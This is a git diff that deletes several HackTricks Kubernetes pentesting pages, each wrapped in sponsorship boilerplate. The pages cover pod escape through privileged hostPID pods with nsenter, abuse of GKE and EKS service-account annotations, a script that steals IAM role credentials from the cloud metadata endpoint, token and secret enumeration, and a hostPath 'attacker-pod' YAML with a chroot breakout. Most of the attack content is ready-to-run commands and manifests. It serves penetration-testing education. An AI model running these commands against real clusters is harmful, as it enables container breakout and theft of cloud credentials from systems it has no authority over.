- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md deleted file mode 100644 index 811a033b1..000000000 --- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md +++ /dev/null @@ -1,74 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Privileged and hostPID - -With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\ -Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp). - -Just executing something like the following will allow you to escape from the pod: - -```bash -nsenter --target 1 --mount --uts --ipc --net --pid -- bash -``` - -Configuration example: - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: priv-and-hostpid-exec-pod - labels: - app: pentest -spec: - hostPID: true - containers: - - name: priv-and-hostpid-pod - image: ubuntu - tty: true - securityContext: - privileged: true - command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] - #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -``` - -# Privileged only - - - - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md b/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md deleted file mode 100644 index af1fc55f0..000000000 --- a/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md +++ /dev/null @@ -1,254 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# GCP - -If you are running a k8s cluster inside GCP you will probably want that some application running inside the cluster has some access to GCP. There are 2 common ways of doing that: - -## Mounting GCP-SA keys as secret - -A common way to give **access to a kubernetes application to GCP** is to: - -* Create a GCP Service Account -* Bind on it the desired permissions -* Download a json key of the created SA -* Mount it as a secret inside the pod -* Set the GOOGLE\_APPLICATION\_CREDENTIALS environment variable pointing to the path where the json is. - -{% hint style="warning" %} -Therefore, as an **attacker**, if you compromise a container inside a pod, you should check for that **env** **variable** and **json** **files** with GCP credentials. -{% endhint %} - -## GKE Workload Identity - -With Workload Identity, we can configure a[ Kubernetes service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/) to act as a[ Google service account](https://cloud.google.com/iam/docs/understanding-service-accounts). Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs. - -The **first series of steps** to enable this behaviour is to **enable Workload Identity in GCP** ([**steps**](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)) and create the GCP SA you want k8s to impersonate. 
- -The **second steps** is to relate a K8s SA (KSA) with the GCP SA (GSA): - -* Create the KSA (normally in the **annotations appear the email of the GSA**) and use it in the pod you would like to: - -```yaml -# serviceAccount.yaml -apiVersion: v1 -kind: ServiceAccount -metadata: - annotations: - iam.gke.io/gcp-service-account: $GSA-NAME@PROJECT-ID.iam.gserviceaccount.com - name: $APPNAME - namespace: $NAMESPACE -``` - -* Create the KSA - GSA Binding: - -```bash -gcloud iam service-accounts \ - --role roles/iam.workloadIdentityUser \ - --member "serviceAccount:PROJECT-ID.svc.id.goog[$NAMESPACE/$KSA-NAME]" \ - $GSA-NAME@PROJECT-ID.iam.gserviceaccount.com -``` - -Note how you are creating a binding and in the **member field you can find the namespace and KSA name**. - -{% hint style="warning" %} -As an attacker inside K8s you should **search for SAs** with the **`iam.gke.io/gcp-service-account` annotation** as that indicates that the SA can access something in GCP. Another option would be to try to abuse each KSA in the cluster and check if it has access.\ -From GCP is always interesting to enumerate the bindings and know **which access are you giving to SAs inside Kubernetes**. 
-{% endhint %} - -This is a script to easily **iterate over the all the pods** definitions **looking** for that **annotation**: - -```bash -for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do - for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do - echo "Pod: $ns/$pod" - kubectl get pod "$pod" -n "$ns" -o yaml | grep "gcp-service-account" - echo "" - echo "" - done -done | grep -B 1 "gcp-service-account" -``` - -# AWS - -## Kiam & Kube2IAM (IAM role for Pods) - -An (outdated) way to give IAM Roles to Pods is to use a [**Kiam**](https://github.com/uswitch/kiam) or a [**Kube2IAM**](https://github.com/jtblin/kube2iam) **server.** Basically you will need to run a **daemonset** in your cluster with a **kind of privileged IAM role**. This daemonset will be the one that will give access to IAM roles to the pods that need it. - -First of all you need to configure **which roles can be accessed inside the namespace**, and you do that with an annotation inside the namespace object: - -{% code title="Kiam" %} -```yaml -kind: Namespace -metadata: - name: iam-example - annotations: - iam.amazonaws.com/permitted: ".*" -``` -{% endcode %} - -{% code title="Kube2iam" %} -```yaml -apiVersion: v1 -kind: Namespace -metadata: - annotations: - iam.amazonaws.com/allowed-roles: | - ["role-arn"] - name: default -``` -{% endcode %} - -Once the namespace is configured with the IAM roles the Pods can have you can **indicate the role you want on each pod definition with something like**: - -{% code title="Kiam & Kube2iam" %} -```yaml -kind: Pod -metadata: - name: foo - namespace: external-id-example - annotations: - iam.amazonaws.com/role: reportingdb-reader -``` -{% endcode %} - -{% hint style="warning" %} -As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and 
more (if you have access to AWS account enumerate the roles). -{% endhint %} - -### Create Pod with IAM Role - -{% hint style="info" %} -The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it. -{% endhint %} - -```yaml -echo 'apiVersion: v1 -kind: Pod -metadata: - annotations: - iam.amazonaws.com/role: transaction-metadata - name: alpine - namespace: eevee -spec: - containers: - - name: alpine - image: alpine - command: ["/bin/sh"] - args: ["-c", "sleep 100000"]' | kubectl apply -f - -``` - -## Workflow of IAM role for Service Accounts via OIDC - -This is the recommended way by AWS. - -1. First of all you need to [create an OIDC provider for the cluster](https://docs.aws.amazon.com/eks/latest/userguide/enable-iam-roles-for-service-accounts.html). -2. Then you create an IAM role with the permissions the SA will require. -3. Create a [trust relationship between the IAM role and the SA](https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts-technical-overview.html) name (or the namespaces giving access to the role to all the SAs of the namespace). _The trust relationship will mainly check the OIDC provider name, the namespace name and the SA name_. -4. Finally, **create a SA with an annotation indicating the ARN of the role**, and the pods running with that SA will have **access to the token of the role**. 
The **token** is **written** inside a file and the path is specified in **`AWS_WEB_IDENTITY_TOKEN_FILE`** (default: `/var/run/secrets/eks.amazonaws.com/serviceaccount/token`) - -(You can find an example of this configuration [here](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/)) - -```yaml -apiVersion: v1 -kind: ServiceAccount -metadata: - annotations: - eks.amazonaws.com/role-arn: arn:aws-cn:iam::ACCOUNT_ID:role/IAM_ROLE_NAME -``` - -{% hint style="warning" %} -As an attacker, if you can enumerate a K8s cluster, check for **service accounts with that annotation** to **escalate to AWS**. To do so, just **exec/create** a **pod** using one of the IAM **privileged service accounts** and steal the token. - -Moreover, if you are inside a pod, check for env variables like **AWS\_ROLE\_ARN** and **AWS\_WEB\_IDENTITY\_TOKEN.** - - -{% endhint %} - -## Find Pods a SAs with IAM Roles in the Cluster - -This is a script to easily **iterate over the all the pods and sas** definitions **looking** for that **annotation**: - -```bash -for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do - for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do - echo "Pod: $ns/$pod" - kubectl get pod "$pod" -n "$ns" -o yaml | grep "amazonaws.com" - echo "" - echo "" - done - for sa in `kubectl get serviceaccounts -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do - echo "SA: $ns/$sa" - kubectl get serviceaccount "$sa" -n "$ns" -o yaml | grep "amazonaws.com" - echo "" - echo "" - done -done | grep -B 1 "amazonaws.com" -``` - -## Node IAM Role - -The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. 
This means that the Node is highly probable going to **have a new IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_). - -There is however an important requirement to access the metadata endpoint from the node, you need to be in the node (ssh session?) or at least have the same network: - -```bash -kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}' -``` - -## Steal IAM Role Token - -Previously we have discussed how to **attach IAM Roles to Pods** or even how to **escape to the Node to steal the IAM Role** the instance has attached to it. - -You can use the following script to **steal** your new hard worked **IAM role credentials**: - -```bash -IAM_ROLE_NAME=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || wget http://169.254.169.254/latest/meta-data/iam/security-credentials/ -O - 2>/dev/null) -if [ "$IAM_ROLE_NAME" ]; then - echo "IAM Role discovered: $IAM_ROLE_NAME" - if ! echo "$IAM_ROLE_NAME" | grep -q "empty role"; then - echo "Credentials:" - curl "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE_NAME" 2>/dev/null || wget "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE_NAME" -O - 2>/dev/null - fi -fi -``` - -# References - -* [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c) -* [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md deleted file mode 100644 index ed1996582..000000000 --- a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md +++ /dev/null @@ -1,504 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Kubernetes Tokens - -If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**. - -In this folder you might find config files with **tokens and configurations to connect to the API server**. In this folder you can also find a cache folder with information previously retrieved. - -If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env: - -## Service Account Tokens - -Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](../../pentesting/pentesting-kubernetes/#architecture)**.** - -Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server): - -_β€œWhen you create a pod, if you do not specify a service account, it is automatically assigned the_ default _service account in the same namespace.”_ - -**ServiceAccount** is an object managed by Kubernetes and used to provide an identity for processes that run in a pod.\ -Every service account has a secret related to it and this secret contains a bearer token. This is a JSON Web Token (JWT), a method for representing claims securely between two parties. - -Usually **one** of the directories: - -* `/run/secrets/kubernetes.io/serviceaccount` -* `/var/run/secrets/kubernetes.io/serviceaccount` -* `/secrets/kubernetes.io/serviceaccount` - -contain the files: - -* **ca.crt**: It's the ca certificate to check kubernetes communications -* **namespace**: It indicates the current namespace -* **token**: It contains the **service token** of the current pod. 
- -Now that you have the token, you can find the API server inside the environment variable **`KUBECONFIG`**. For more info run `(env | set) | grep -i "kuber|kube`**`"`** - -The service account token is being signed by the key residing in the file **sa.key** and validated by **sa.pub**. - -Default location on **Kubernetes**: - -* /etc/kubernetes/pki - -Default location on **Minikube**: - -* /var/lib/localkube/certs - -## Hot Pods - -_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc. - -# RBAC - -If you don't know what is **RBAC**, [**read this section**](../../pentesting/pentesting-kubernetes/#cluster-hardening-rbac). - -# Enumeration CheatSheet - -In order to enumerate a K8s environment you need a couple of this: - -* A **valid authentication token**. In the previous section we saw where to search for a user token and for a service account token. -* The **address (**_**https://host:port**_**) of the Kubernetes API**. This can be usually found in the environment variables and/or in the kube config file. -* **Optional**: The **ca.crt to verify the API server**. This can be found in the same places the token can be found. This is useful to verify the API server certificate, but using `--insecure-skip-tls-verify` with `kubectl` or `-k` with `curl` you won't need this. - -With those details you can **enumerate kubernetes**. If the **API** for some reason is **accessible** through the **Internet**, you can just download that info and enumerate the platform from your host. 
- -However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server. - -## Differences between `list` and `get` verbs - -With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API: - -``` -GET /apis/apps/v1/namespaces/{namespace}/deployments/{name} -``` - -If you have the **`list`** permission, you are allowed to execute API requests to list a type of asset (_`get` option in `kubectl`_): - -```bash -#In a namespace -GET /apis/apps/v1/namespaces/{namespace}/deployments -#In all namespaces -GET /apis/apps/v1/deployments -``` - -If you have the **`watch`** permission, you are allowed to execute API requests to monitor assets: - -``` -GET /apis/apps/v1/deployments?watch=true -GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true -GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name} [DEPRECATED] -GET /apis/apps/v1/watch/namespaces/{namespace}/deployments [DEPRECATED] -GET /apis/apps/v1/watch/deployments [DEPRECATED] -``` - -They open a streaming connection that returns you the full manifest of a Deployment whenever it changes (or when a new one is created). - -{% hint style="danger" %} -The following `kubectl` commands indicates just how to list the objects. 
If you want to access the data you need to use `describe` instead of `get` -{% endhint %} - -## Using curl - -From inside a pod you can use several env variables: - -```bash -export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS} -export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount -export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace) -export TOKEN=$(cat ${SERVICEACCOUNT}/token) -export CACERT=${SERVICEACCOUNT}/ca.crt -alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\"" -``` - -## Using kubectl - -Having the token and the address of the API server you use kubectl or curl to access it as indicated here: - -```bash -alias k='kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify=true' -``` - -You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). The goal of the following sections is to present in ordered manner different options to enumerate and understand the new K8s you have obtained access to. 
- -To find the HTTP request that `kubectl` sends you can use the parameter `-v=8` - -## Current Configuration - -{% tabs %} -{% tab title="Kubectl" %} -```bash -kubectl config get-users -kubectl config get-contexts -kubectl config get-clusters -kubectl config current-context - -# Change namespace -kubectl config set-context --current --namespace= -``` -{% endtab %} -{% endtabs %} - -If you managed to steal some users credentials you can **configure them locally** using something like: - -```bash -kubectl config set-credentials USER_NAME \ - --auth-provider=oidc \ - --auth-provider-arg=idp-issuer-url=( issuer url ) \ - --auth-provider-arg=client-id=( your client id ) \ - --auth-provider-arg=client-secret=( your client secret ) \ - --auth-provider-arg=refresh-token=( your refresh token ) \ - --auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \ - --auth-provider-arg=id-token=( your id_token ) -``` - -## Get Supported Resources - -With this info you will know all the services you can list - -{% tabs %} -{% tab title="kubectl" %} -```bash -k api-resources --namespaced=true #Resources specific to a namespace -k api-resources --namespaced=false #Resources NOT specific to a namespace -``` -{% endtab %} -{% endtabs %} - -## Get Current Privileges - -{% tabs %} -{% tab title="kubectl" %} -```bash -k auth can-i --list #Get privileges in general -k auth can-i --list -n custnamespace #Get privileves in custnamespace - -# Get service account permissions -k auth can-i --list --as=system:serviceaccount:: -n -``` -{% endtab %} - -{% tab title="API" %} -```bash -kurl -i -s -k -X $'POST' \ - -H $'Content-Type: application/json' \ - --data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \ - 
"https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" -``` -{% endtab %} -{% endtabs %} - -You can learn more about **Kubernetes RBAC** in - -{% content-ref url="../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md" %} -[kubernetes-role-based-access-control-rbac.md](../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md) -{% endcontent-ref %} - -**Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -## Get Others roles - -{% tabs %} -{% tab title="kubectl" %} -```bash -k get roles -k get clusterroles -``` -{% endtab %} - -{% tab title="API" %} -```bash -kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/roles?limit=500" -kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clusterroles?limit=500" -``` -{% endtab %} -{% endtabs %} - -## Get namespaces - -Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**. 
- -{% tabs %} -{% tab title="kubectl" %} -```bash -k get namespaces -``` -{% endtab %} - -{% tab title="API" %} -```bash -kurl -k -v https://$APISERVER/api/v1/namespaces/ -``` -{% endtab %} -{% endtabs %} - -## Get secrets - -{% tabs %} -{% tab title="kubectl" %} -``` -k get secrets -o yaml -k get secrets -o yaml -n custnamespace -``` -{% endtab %} - -{% tab title="API" %} -```bash -kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/ - -curl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/ -``` -{% endtab %} -{% endtabs %} - -If you can read secrets you can use the following lines to get the privileges related to each to token: - -```bash -for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done -``` - -## Get Service Accounts - -As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges. - -{% tabs %} -{% tab title="kubectl" %} -```bash -k get serviceaccounts -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts -``` -{% endtab %} -{% endtabs %} - -## Get Deployments - -The deployments specify the **components** that need to be **run**. - -{% tabs %} -{% tab title="kubectl" %} -``` -.k get deployments -k get deployments -n custnamespace -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/api/v1/namespaces//deployments/ -``` -{% endtab %} -{% endtabs %} - -## Get Pods - -The Pods are the actual **containers** that will **run**. 
- -{% tabs %} -{% tab title="kubectl" %} -``` -k get pods -k get pods -n custnamespace -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/api/v1/namespaces//pods/ -``` -{% endtab %} -{% endtabs %} - -## Get Services - -Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack. - -{% tabs %} -{% tab title="kubectl" %} -``` -k get services -k get services -n custnamespace -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/api/v1/namespaces/default/services/ -``` -{% endtab %} -{% endtabs %} - -## Get nodes - -Get all the **nodes configured inside the cluster**. - -{% tabs %} -{% tab title="kubectl" %} -``` -k get nodes -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/api/v1/nodes/ -``` -{% endtab %} -{% endtabs %} - -## Get DaemonSets - -**DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed. - -{% tabs %} -{% tab title="kubectl" %} -``` -k get daemonsets -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets -``` -{% endtab %} -{% endtabs %} - -## Get cronjob - -Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action. 
- -{% tabs %} -{% tab title="kubectl" %} -``` -k get cronjobs -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/apis/batch/v1beta1/namespaces//cronjobs -``` -{% endtab %} -{% endtabs %} - -## Get "all" - -{% tabs %} -{% tab title="kubectl" %} -``` -k get all -``` -{% endtab %} -{% endtabs %} - -## **Get Pods consumptions** - -{% tabs %} -{% tab title="kubectl" %} -``` -k top pod --all-namespaces -``` -{% endtab %} -{% endtabs %} - -## Escaping from the pod - -If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes. - -```bash -kubectl get pod [-n ] -o yaml -``` - -Then you create your attack.yaml file - -```yaml -apiVersion: v1 -kind: Pod -metadata: - labels: - run: attacker-pod - name: attacker-pod - namespace: default -spec: - volumes: - - name: host-fs - hostPath: - path: / - containers: - - image: ubuntu - imagePullPolicy: Always - name: attacker-pod - volumeMounts: - - name: host-fs - mountPath: /root - restartPolicy: Never -``` - -[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba) - -After that you create the pod - -```bash -kubectl apply -f attacker.yaml [-n ] -``` - -Now you can switch to the created pod as follows - -```bash -kubectl exec -it attacker-pod [-n ] -- bash # attacker-pod is the name defined in the yaml file -``` - -And finally you chroot into the node's system - -```bash -chroot /root /bin/bash -``` - -Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume β€” Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 
1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/) - -# References - -{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %} - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md b/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md deleted file mode 100644 index 79acbba35..000000000 --- a/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md +++ /dev/null @@ -1,318 +0,0 @@ -# Kubernetes Network Attacks - -
